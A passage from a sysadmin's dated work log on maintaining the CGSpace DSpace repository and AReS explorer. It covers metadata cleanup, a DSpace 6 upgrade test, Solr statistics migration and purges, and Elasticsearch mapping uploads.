+
    +
  • Add “Infographic” to types in input form
  • +
  • Looking into the spider agent issue from last week, where hits seem to be logged regardless of ANY spider agent patterns being loaded +
      +
    • I changed the following two options: +
        +
      • usage-statistics.logBots = false
      • +
      • usage-statistics.bots.case-insensitive = true
      • +
      +
    • +
    • Then I made several requests with a bot user agent:
    • +
    +
  • +
+
$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
+$ curl -s 'http://localhost:8083/solr/statistics/update?softCommit=true'
+
    +
  • And I saw three hits in Solr with isBot: true!!! +
      +
    • I made a few more requests with user agent “fumanchu” and it logs them with isBot: false
    • +
    • I made a request with user agent “Delphi 2009” which is in the ilri pattern file, and it was logged with isBot: true
    • +
    • I made a few more requests and confirmed that if a pattern is in the list it gets logged with isBot: true despite the fact that usage-statistics.logBots is false…
    • +
    • So WTF this means that it knows they are from a bot, but it logs them anyways
    • +
    • Is this an issue with Atmire’s modules?
    • +
    • I sent them feedback on the ticket
    • +
    +
  • +
+

2020-10-21

+
    +
  • Peter needs to do some reporting on gender across the entirety of CGSpace so he asked me to tag a bunch of items with the AGROVOC “gender” subject (in CGIAR Gender Platform community, all ILRI items with subject “gender” or “women”, all CCAFS with “gender and social inclusion” etc) +
      +
    • First I exported the Gender Platform community and tagged all the items there with “gender” in OpenRefine
    • +
    • Then I exported all of CGSpace and extracted just the ILRI and other center-specific tags with csvcut:
    • +
    +
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
+$ dspace metadata-export -f /tmp/cgspace.csv
+$ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US],cg.subject.alliancebiovciat[],cg.subject.alliancebiovciat[en_US],cg.subject.bioversity[en_US],cg.subject.ccafs[],cg.subject.ccafs[en_US],cg.subject.ciat[],cg.subject.ciat[en_US],cg.subject.cip[],cg.subject.cip[en_US],cg.subject.cpwf[en_US],cg.subject.iita,cg.subject.iita[en_US],cg.subject.iwmi[en_US]' /tmp/cgspace.csv > /tmp/cgspace-subjects.csv
+
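  • (The same kind of filtering could also be done from the command line with csvgrep from the csvkit suite, for example to pull out rows where the ILRI subject mentions gender or women — just a sketch, the actual filtering was done in OpenRefine:)
$ csvgrep -c 'cg.subject.ilri[en_US]' -r '(GENDER|WOMEN)' /tmp/cgspace-subjects.csv > /tmp/cgspace-ilri-gender.csv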
    +
  • Then I went through all center subjects looking for “WOMEN” or “GENDER” and checking if they were missing the associated AGROVOC subject +
      +
    • To reduce the size of the CSV file I removed all center subject columns after filtering them, and I flagged all rows that I changed so I could upload a CSV with only the items that were modified
    • +
    • In total it was about 1,100 items that I tagged across the Gender Platform community and elsewhere
    • +
    • Also, I ran the CSVs through my csv-metadata-quality checker to do basic sanity checks, which ended up removing a few dozen duplicated subjects
    • +
    +
  • +
+

2020-10-22

+
    +
  • Bosede was getting this error on CGSpace yesterday:
  • +
+
Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:1072 by user 1759
+
    +
  • Collection 1072 appears to be IITA Miscellaneous +
      +
    • The submit step is defined, but has no users or groups
    • +
    • I added the IITA submitters there and told Bosede to try again
    • +
    +
  • +
  • Add two new blocks to list the top communities and collections on AReS
  • +
  • I want to extract all CRPs and affiliations from AReS to do some text processing and create some mappings… +
      +
    • First extract 10,000 affiliations from Elasticsearch by only including the affiliation source:
    • +
    +
  • +
+
$ http 'http://localhost:9200/openrxv-items-final/_search?_source_includes=affiliation&size=10000&q=*:*' > /tmp/affiliations.json
+
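  • (The affiliations can then be flattened and counted with jq, assuming each hit’s _source has an affiliation array — a sketch:)
$ jq -r '.hits.hits[]._source.affiliation[]?' /tmp/affiliations.json | sort | uniq -c | sort -rn | head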
    +
  • Then I decided to try a different approach and I adjusted my convert-mapping.py script to re-consider some replacement patterns with acronyms from the original AReS mapping.json file to hopefully address some MEL to CGSpace mappings +
      +
    • For example, to changes this: +
        +
      • find: International Livestock Research Institute
      • +
      • replace: International Livestock Research Institute - ILRI
      • +
      +
    • +
    • … into this: +
        +
      • find: International Livestock Research Institute - ILRI
      • +
      • replace: International Livestock Research Institute
      • +
      +
    • +
    +
  • +
  • I re-uploaded the mappings to Elasticsearch like I did yesterday and restarted the harvesting
  • +
+

2020-10-24

+
    +
  • Atmire sent a small version bump to CUA (6.x-4.1.10-ilri-RC5) to fix the logging of bot requests when usage-statistics.logBots is false +
      +
    • I tested it by making several requests to DSpace Test with the RTB website BOT and Delphi 2009 user agents and can verify that they are no longer logged
    • +
    +
  • +
  • I spent a few hours working on mappings on AReS +
      +
    • I decided to do a full re-harvest on AReS with no mappings so I could extract the CRPs and affiliations to see how much work they needed
    • +
    • I worked on my Python script to process some cleanups of the values to create find/replace mappings for common scenarios: +
        +
      • Removing acronyms from the end of strings
      • +
      • Removing “CRP on " from strings
      • +
      +
    • +
    • The problem is that the mappings are applied to all fields, and we want to keep “CGIAR Research Program on …” in the authors, but not in the CRPs field
    • +
    • Really the best solution is to have each repository use the same controlled vocabularies
    • +
    +
  • +
+

2020-10-25

+
    +
  • I re-installed DSpace Test with a fresh snapshot of CGSpace to test the DSpace 6 upgrade (the last time was in 2020-05, and we’ve fixed a lot of issues since then):
  • +
+
$ cp dspace/etc/postgres/update-sequences.sql /tmp/dspace5-update-sequences.sql
+$ git checkout origin/6_x-dev-atmire-modules
+$ chrt -b 0 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false clean package
+$ sudo su - postgres
+$ psql dspacetest -c 'CREATE EXTENSION pgcrypto;'
+$ psql dspacetest -c "DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');"
+$ exit
+$ sudo systemctl stop tomcat7
+$ cd dspace/target/dspace-installer
+$ rm -rf /blah/dspacetest/config/spring
+$ ant update
+$ dspace database migrate
+(10 minutes)
+$ sudo systemctl start tomcat7
+(discovery indexing starts)
+
    +
  • Then I started processing the Solr stats one core and 1 million records at a time:
  • +
+
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
+
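  • (Running it in a shell loop saves re-typing the same command, for example:)
$ for run in 1 2 3 4 5; do chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics; done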
    +
  • After the fifth or so run I got this error:
  • +
+
Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:68)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:54)
+        at org.dspace.util.SolrUpgradePre6xStatistics.batchUpdateStats(SolrUpgradePre6xStatistics.java:161)
+        at org.dspace.util.SolrUpgradePre6xStatistics.run(SolrUpgradePre6xStatistics.java:456)
+        at org.dspace.util.SolrUpgradePre6xStatistics.main(SolrUpgradePre6xStatistics.java:365)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+
    +
  • So basically, as I saw at this same step in 2020-05, there are some documents that have IDs that have not been converted to UUID, and have not been labeled as “unmigrated” either… +
      +
    • I see there are about 217,000 of them, 99% of which are of type: 5 which is “site”
    • +
    • I purged them:
    • +
    +
  • +
+
$ curl -s "http://localhost:8083/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
+
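  • (Before running a delete like that it’s worth counting what the query actually matches, for example with rows=0 — a sketch:)
$ curl -s 'http://localhost:8083/solr/statistics/select' --data-urlencode 'q=(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)' --data-urlencode 'rows=0'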
    +
  • Then I restarted the solr-upgrade-statistics-6x process, which apparently had no records left to process
  • +
  • I started processing the statistics-2019 core… +
      +
    • I managed to process 7.5 million records in 7 hours without any errors!
    • +
    +
  • +
+

2020-10-26

+
    +
  • The statistics processing on the statistics-2018 core errored after 1.8 million records:
  • +
+
Exception: Java heap space
+java.lang.OutOfMemoryError: Java heap space
+
    +
  • I had the same problem when I processed the statistics-2018 core in 2020-07 and 2020-08 +
      +
    • I will try to purge some unmigrated records (around 460,000), most of which are of type: 5 (site) so not relevant to our views and downloads anyways:
    • +
    +
  • +
+
$ curl -s "http://localhost:8083/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>id:/.+-unmigrated/</query></delete>"
+
    +
  • I restarted the process and it crashed again a few minutes later +
      +
    • I increased the memory to 4096m and tried again
    • +
    • It eventually completed, after which time I purge all remaining 350,000 unmigrated records (99% of which were type: 5):
    • +
    +
  • +
+
$ curl -s "http://localhost:8083/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
+
    +
  • Then I started processing the statistics-2017 core… +
      +
    • The processing finished with no errors and afterwards I purged 800,000 unmigrated records (all with type: 5):
    • +
    +
  • +
+
$ curl -s "http://localhost:8083/solr/statistics-2017/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
+
+

2020-10-27

+
    +
  • I purged 849,408 unmigrated records from the statistics-2016 core after it finished processing…
  • +
  • I purged 285,000 unmigrated records from the statistics-2015 core after it finished processing…
  • +
  • I purged 196,000 unmigrated records from the statistics-2014 core after it finished processing…
  • +
  • I finally finished processing all the statistics cores with the solr-upgrade-statistics-6x utility on DSpace Test +
      +
    • I started the Atmire stats processing:
    • +
    +
  • +
+
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics
+
    +
  • Peter asked me to add the new preferred AGROVOC subject “covid-19” to all items we had previously added “coronavirus disease”, and to make sure all items with ILRI subject “ZOONOTIC DISEASES” have the AGROVOC subject “zoonoses” +
      +
    • I exported all the records on CGSpace from the CLI and extracted the columns I needed to process them in OpenRefine:
    • +
    +
  • +
+
$ dspace metadata-export -f /tmp/cgspace.csv
+$ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US]' /tmp/cgspace.csv > /tmp/cgspace-subjects.csv
+
    +
  • I sanity checked the CSV in csv-metadata-quality after exporting from OpenRefine, then applied the changes to 453 items on CGSpace
  • +
  • Skype with Peter and Abenet about CGSpace Explorer (AReS) +
      +
    • They want to do a big push in ILRI and our partners to use it in mid November (around 16th) so we need to clean up the metadata and try to fix the views/downloads issue by then
    • +
    • I filed an issue on OpenRXV for the views/downloads
    • +
    • We also talked about harvesting CIMMYT’s repository into AReS, perhaps with only a subset of their data, though they seem to have some issues with their data: +
        +
      • dc.contributor.author and dcterms.creator
      • +
      • dc.title and dcterms.title
      • +
      • dc.region.focus
      • +
      • dc.coverage.countryfocus
      • +
      • dc.rights.accesslevel (access status)
      • +
      • dc.source.journal (source)
      • +
      • dcterms.type and dc.type
      • +
      • dc.subject.agrovoc
      • +
      +
    • +
    +
  • +
  • I did some work on my previous create-mappings.py script to process journal titles and sponsors/investors as well as CRPs and affiliations +
      +
    • I converted it to use the Elasticsearch scroll API directly rather than consuming a JSON file
    • +
    • The result is about 1200 mappings, mostly to remove acronyms at the end of metadata values
    • +
    • I added a few custom mappings using convert-mapping.py and then uploaded them to AReS:
    • +
    +
  • +
+
$ ./create-mappings.py > /tmp/elasticsearch-mappings.txt
+$ ./convert-mapping.py >> /tmp/elasticsearch-mappings.txt
+$ curl -XDELETE http://localhost:9200/openrxv-values
+$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @/tmp/elasticsearch-mappings.txt
+
    +
  • After that I had to manually create and delete a fake mapping in the AReS UI so that the mappings would show up
  • +
  • I fixed a few strings in the OpenRXV admin dashboard and then re-built the frontend container:
  • +
+
$ docker-compose up --build -d angular_nginx
+

2020-10-28

+
    +
  • Fix a handful more of grammar and spelling issues in OpenRXV and then re-build the containers:
  • +
+
$ docker-compose up --build -d --force-recreate angular_nginx
+
    +
  • Also, I realized that the mysterious issue with countries getting changed to inconsistent lower case like “Burkina faso” is due to the country formatter (see: backend/src/harvester/consumers/fetch.consumer.ts) +
      +
    • I don’t understand Typescript syntax so for now I will just disable that formatter in each repository configuration and I’m sure it will be better, as we’re all using title case like “Kenya” and “Burkina Faso” now anyways
    • +
    +
  • +
  • Also, I fixed a few mappings with WorldFish data
  • +
  • Peter really wants us to move forward with the alignment of our regions to UN M.49, and the CKM web team hasn’t responded to any of the mails we’ve sent recently so I will just do it +
      +
    • These are the changes that will happen in the input forms: +
        +
      • East Africa → Eastern Africa
      • +
      • West Africa → Western Africa
      • +
      • Southeast Asia → South-eastern Asia
      • +
      • South Asia → Southern Asia
      • +
      • Africa South of Sahara → Sub-Saharan Africa
      • +
      • North Africa → Northern Africa
      • +
      • West Asia → Western Asia
      • +
      +
    • +
    • There are some regions we use that are not present, for example Sahel, ACP, Middle East, and West and Central Africa. I will advocate for closer alignment later
    • +
    • I ran my fix-metadata-values.py script to update the values in the database:
    • +
    +
  • +
+
$ cat 2020-10-28-update-regions.csv
+cg.coverage.region,correct
+East Africa,Eastern Africa
+West Africa,Western Africa
+Southeast Asia,South-eastern Asia
+South Asia,Southern Asia
+Africa South Of Sahara,Sub-Saharan Africa
+North Africa,Northern Africa
+West Asia,Western Asia
+$ ./fix-metadata-values.py -i 2020-10-28-update-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227 -d
+
    +
  • Then I started a full Discovery re-indexing:
  • +
+
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    92m14.294s
+user    7m59.840s
+sys     2m22.327s
+
    +
  • I realized I had been using an incorrect Solr query to purge unmigrated items after processing with solr-upgrade-statistics-6x… +
      +
    • Instead of this: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
    • +
    • I should have used this: id:/.+-unmigrated/
    • +
    • Or perhaps this (with a check first!): *:* NOT id:/.{36}/
    • +
    • We need to make sure to explicitly purge the unmigrated records, then purge any that are not matching the UUID pattern (after inspecting manually!)
    • +
    • There are still 3.7 million records in our ten years of Solr statistics that are unmigrated (I only noticed because the DSpace Statistics API indexer kept failing)
    • +
    • I don’t think this is serious enough to re-start the simulation of the DSpace 6 migration over again, but I definitely want to make sure I use the correct query when I do CGSpace
    • +
    +
  • +
  • The AReS indexing finished after I removed the country formatting from all the repository configurations and now I see values like “SA”, “CA”, etc… +
      +
    • So really we need this to fix MELSpace countries, so I will re-enable the country formatting for their repository
    • +
    +
  • +
  • Send Peter a list of affiliations, authors, journals, publishers, investors, and series for correction:
  • +
+
dspace=> \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-affiliations.csv WITH CSV HEADER;
+COPY 6357
+dspace=> \COPY (SELECT DISTINCT text_value as "dc.description.sponsorship", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-sponsors.csv WITH CSV HEADER;
+COPY 730
+dspace=> \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-authors.csv WITH CSV HEADER;
+COPY 71748
+dspace=> \COPY (SELECT DISTINCT text_value as "dc.publisher", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 39 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-publishers.csv WITH CSV HEADER;
+COPY 3882
+dspace=> \COPY (SELECT DISTINCT text_value as "dc.source", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 55 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-journal-titles.csv WITH CSV HEADER;
+COPY 3684
+dspace=> \COPY (SELECT DISTINCT text_value as "dc.relation.ispartofseries", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 43 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-series.csv WITH CSV HEADER;
+COPY 5598
+
    +
  • I noticed there are still some mappings for acronyms and other fixes that haven’t been applied, so I ran my create-mappings.py script against Elasticsearch again +
      +
    • Now I’m comparing yesterday’s mappings with today’s and I don’t see any duplicates…
    • +
    +
  • +
+
$ grep -c '"find"' /tmp/elasticsearch-mappings*
+/tmp/elasticsearch-mappings2.txt:350
+/tmp/elasticsearch-mappings.txt:1228
+$ cat /tmp/elasticsearch-mappings* | grep -v '{"index":{}}' | wc -l
+1578
+$ cat /tmp/elasticsearch-mappings* | grep -v '{"index":{}}' | sort | uniq | wc -l
+1578
+
    +
  • I have no idea why they wouldn’t have been caught yesterday when I originally ran the script on a clean AReS with no mappings… +
      +
    • In any case, I combined the mappings and then uploaded them to AReS:
    • +
    +
  • +
+
$ cat /tmp/elasticsearch-mappings* > /tmp/new-elasticsearch-mappings.txt
+$ curl -XDELETE http://localhost:9200/openrxv-values
+$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @/tmp/new-elasticsearch-mappings.txt
+
    +
  • The latest indexing (second for today!) finally finished on AReS and the countries and affiliations/crps/journals all look MUCH better +
      +
    • There are still a few acronyms present, some of which are in the value mappings and some which aren’t
    • +
    +
  • +
  • Lower case some straggling AGROVOC subjects on CGSpace:
  • +
+
dspace=# BEGIN;
+dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';
+UPDATE 123
+dspace=# COMMIT;
+
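  • (A SELECT with the same WHERE clause shows how many values would be touched before committing, for example:)
dspace=# SELECT COUNT(*) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';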
    +
  • Move some top-level communities to the CGIAR System community for Peter:
  • +
+
$ dspace community-filiator --set --parent 10568/83389 --child 10568/1208
+$ dspace community-filiator --set --parent 10568/83389 --child 10568/56924
+

2020-10-30

+
    +
  • The AtomicStatisticsUpdateCLI process finished on the current DSpace Test statistics core after about 32 hours +
      +
    • I started it on the statistics-2019 core
    • +
    +
  • +
  • Atmire responded about the duplicate values in Solr that I had asked about a few days ago +
      +
    • They said it could be due to the schema and asked if I see it only on old records or even on new ones created in the new CUA with DSpace 6
    • +
    • I did a test and found that I got duplicate data after browsing for a minute on DSpace Test (version 6) and sent them a screenshot
    • +
    +
  • +
  • Looking over Peter’s corrections to journal titles (dc.source) and publishers (dc.publisher) +
      +
    • I had to check the corrections for strange Unicode errors and replacements with “|” and “;” in OpenRefine using this GREL:
    • +
    +
  • +
+
or(
+  isNotNull(value.match(/.*\uFFFD.*/)),
+  isNotNull(value.match(/.*\u00A0.*/)),
+  isNotNull(value.match(/.*\u200A.*/)),
+  isNotNull(value.match(/.*\u2019.*/)),
+  isNotNull(value.match(/.*\u00b4.*/)),
+  isNotNull(value.match(/.*\u007e.*/))
+).toString()
+
    +
  • Then I did a test to apply the corrections and deletions on my local DSpace:
  • +
+
$ ./fix-metadata-values.py -i 2020-10-30-fix-854-journals.csv -db dspace -u dspace -p 'fuuu' -f dc.source -t 'correct' -m 55
+$ ./delete-metadata-values.py -i 2020-10-30-delete-90-journals.csv -db dspace -u dspace -p 'fuuu' -f dc.source -m 55
+$ ./fix-metadata-values.py -i 2020-10-30-fix-386-publishers.csv -db dspace -u dspace -p 'fuuu' -f dc.publisher -t correct -m 39
+$ ./delete-metadata-values.py -i 2020-10-30-delete-10-publishers.csv -db dspace -u dspace -p 'fuuu' -f dc.publisher -m 39
+
    +
  • I will wait to apply them on CGSpace when I have all the other corrections from Peter processed
  • +
+

2020-10-31

+
    +
  • I had the idea to use the country formatter for CGSpace on the AReS Explorer because we have the cg.coverage.iso3166-alpha2 field… +
      +
    • This will be better than using the raw text values because AReS will match directly from the ISO 3166-1 list when using the country formatter
    • +
    +
  • +
  • Quickly process the sponsor corrections Peter sent me a few days ago and test them locally:
  • +
+
$ ./fix-metadata-values.py -i 2020-10-31-fix-82-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t 'correct' -m 29
+$ ./delete-metadata-values.py -i 2020-10-31-delete-74-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29
+
    +
  • I applied all the fixes from today and yesterday on CGSpace and then started a full Discovery re-index:
  • +
+
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+

November, 2020

+ +
+

2020-11-01

+
    +
  • Continue with processing the statistics-2019 Solr core with the AtomicStatisticsUpdateCLI tool on DSpace Test +
      +
    • So far we’ve spent at least fifty hours to process the statistics and statistics-2019 core… wow.
    • +
    +
  • +
+

2020-11-02

+
    +
  • Talk to Moayad and fix a few issues on OpenRXV: +
      +
    • Incorrect views and downloads (caused by Elasticsearch’s default result set size of 10)
    • +
    • Invalid share link
    • +
    • Missing “https://” for Handles in the Simple Excel report (caused by using the handle instead of the uri)
    • +
    • Sorting the list of items by views
    • +
    +
  • +
  • I resumed the processing of the statistics-2018 Solr core after it spent 20 hours to get to 60%
  • +
+

2020-11-04

+
    +
  • After 29 hours the statistics-2017 core finished processing so I started the statistics-2016 core on DSpace Test
  • +
+

2020-11-05

+
    +
  • Peter sent me corrections and deletions for the author affiliations +
      +
    • I quickly proofed them for UTF-8 issues in OpenRefine and csv-metadata-quality and then tested them locally and then applied them on CGSpace:
    • +
    +
  • +
+
$ ./fix-metadata-values.py -i 2020-11-05-fix-862-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t 'correct' -m 211
+$ ./delete-metadata-values.py -i 2020-11-05-delete-29-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
+
    +
  • Then I started a Discovery re-index on CGSpace:
  • +
+
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    92m24.993s
+user    8m11.858s
+sys     2m26.931s
+

2020-11-06

+
    +
  • Restart the AtomicStatisticsUpdateCLI processing of the statistics-2016 core on DSpace Test after 20 hours… +
      +
    • This phase finished after five hours so I started it on the statistics-2015 core
    • +
    +
  • +
+

2020-11-07

+
    +
  • Atmire responded about the issue with duplicate values in owningComm and containerCommunity etc +
      +
    • I told them to please look into it and use some of our credits if need be
    • +
    +
  • +
  • The statistics-2015 core finished after 20 hours so I started the statistics-2014 core
  • +
+

2020-11-08

+
    +
  • Add “Data Paper” to types on CGSpace
  • +
  • Add “SCALING CLIMATE-SMART AGRICULTURE” to CCAFS subjects on CGSpace
  • +
  • Add “ANDEAN ROOTS AND TUBERS” to CIP subjects on CGSpace
  • +
  • Add CGIAR System subjects to Discovery sidebar facets on CGSpace +
      +
    • Also add the System subject to item view on CGSpace
    • +
    +
  • +
  • The statistics-2014 core finished processing after five hours, so I started processing the statistics-2013 core on DSpace Test
  • +
  • Since I was going to restart CGSpace and update the Discovery indexes anyways I decided to check for any straggling upper case AGROVOC entries and lower case them:
  • +
+
dspace=# BEGIN;
+dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';
+UPDATE 164
+dspace=# COMMIT;
+
    +
  • Run system updates on CGSpace (linode18) and reboot it +
      +
    • I had to restart Tomcat once after the machine started up to get all Solr statistics cores to load properly
    • +
    +
  • +
  • After about ten more hours the rest of the Solr statistics cores finished processing on DSpace Test and I started optimizing them in Solr admin UI
  • +
+

2020-11-10

+
    +
  • I am noticing that CGSpace doesn’t have any statistics showing for years before 2020, but all cores are loaded successfully in Solr Admin UI… strange +
      +
    • I restarted Tomcat and I see in Solr Admin UI that the statistics-2015 core failed to load
    • +
    • Looking in the DSpace log I see:
    • +
    +
  • +
+
2020-11-10 08:43:59,634 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2015
+2020-11-10 08:43:59,687 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2018
+2020-11-10 08:43:59,707 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2015
+2020-11-10 08:44:00,004 WARN  org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
+2020-11-10 08:44:00,005 WARN  org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
+2020-11-10 08:44:00,005 WARN  org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
+2020-11-10 08:44:00,325 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2015
+
    +
  • Seems that the core gets probed twice… perhaps a threading issue? +
      +
    • The only thing I can think of is the acceptorThreadCount parameter in Tomcat’s server.xml, which has been set to 2 since 2018-01 (we started sharding the Solr statistics cores in 2019-01 and that’s when this problem arose)
    • +
    • I will try reducing that to 1
    • +
    • Wow, now it’s even worse:
    • +
    +
  • +
+
2020-11-10 08:51:03,007 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2018
+2020-11-10 08:51:03,008 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2015
+2020-11-10 08:51:03,137 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2018
+2020-11-10 08:51:03,153 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2015
+2020-11-10 08:51:03,289 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2015
+2020-11-10 08:51:03,289 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2010
+2020-11-10 08:51:03,475 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2010
+2020-11-10 08:51:03,475 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2016
+2020-11-10 08:51:03,730 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2016
+2020-11-10 08:51:03,731 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2017
+2020-11-10 08:51:03,992 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2017
+2020-11-10 08:51:03,992 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2011
+2020-11-10 08:51:04,178 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2011
+2020-11-10 08:51:04,178 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2012
+
    +
  • Could it be because we have two Tomcat connectors? +
      +
    • I restarted Tomcat a few more times before all cores loaded, and still there are no stats before 2020-01… hmmmmm
    • +
    +
  • +
  • I added a lowercase formatter to OpenRXV so that we can lowercase AGROVOC subjects during harvesting
  • +
+

2020-11-11

+
    +
  • Atmire responded with a quote for the work to fix the duplicate owningComm, etc in our Solr data +
      +
    • I told them to proceed, as it’s within our budget of credits
    • +
    • They will write a processor for DSpace 6 to remove the duplicates
    • +
    +
  • +
  • I did some tests to add a usage statistics chart to the item views on DSpace Test +
      +
    • It is inspired by Salem’s work on WorldFish’s repository, and it hits the dspace-statistics-api for the current item and displays a graph
    • +
    • I got it working very easily for all-time statistics with Chart.js, but I think I will need to use Highcharts or something else because Chart.js is HTML5 canvas and doesn’t allow theming via CSS (so our Bootstrap brand colors for each theme won’t work) +
        +
      • Hmm, Highcharts is not licensed under an open source license so I will not use it
      • +
      • Perhaps I’ll use Chartist with the popover plugin…
      • +
      +
    • +
    • I think I’ll pursue this after the DSpace 6 upgrade…
    • +
    +
  • +
+

2020-11-12

+
    +
  • I was looking at Solr again trying to find a way to get community and collection stats by faceting on owningComm and owningColl and it seems to work actually +
      +
    • The duplicated values in the multi-value fields don’t seem to affect the counts, as I had thought previously (though we should still get rid of them)
    • +
    • One major difference between the raw numbers I was looking at and Atmire’s numbers is that Atmire’s code filters “Internal” IP addresses…
    • +
    • Also, instead of doing isBot:false I think I should do -isBot:true because it’s not a given that all documents will have this field and have it false, but we can definitely exclude the ones that have it as true
    • +
    +
  • +
  • First we get the total number of communities with stats (using calcdistinct):
  • +
+
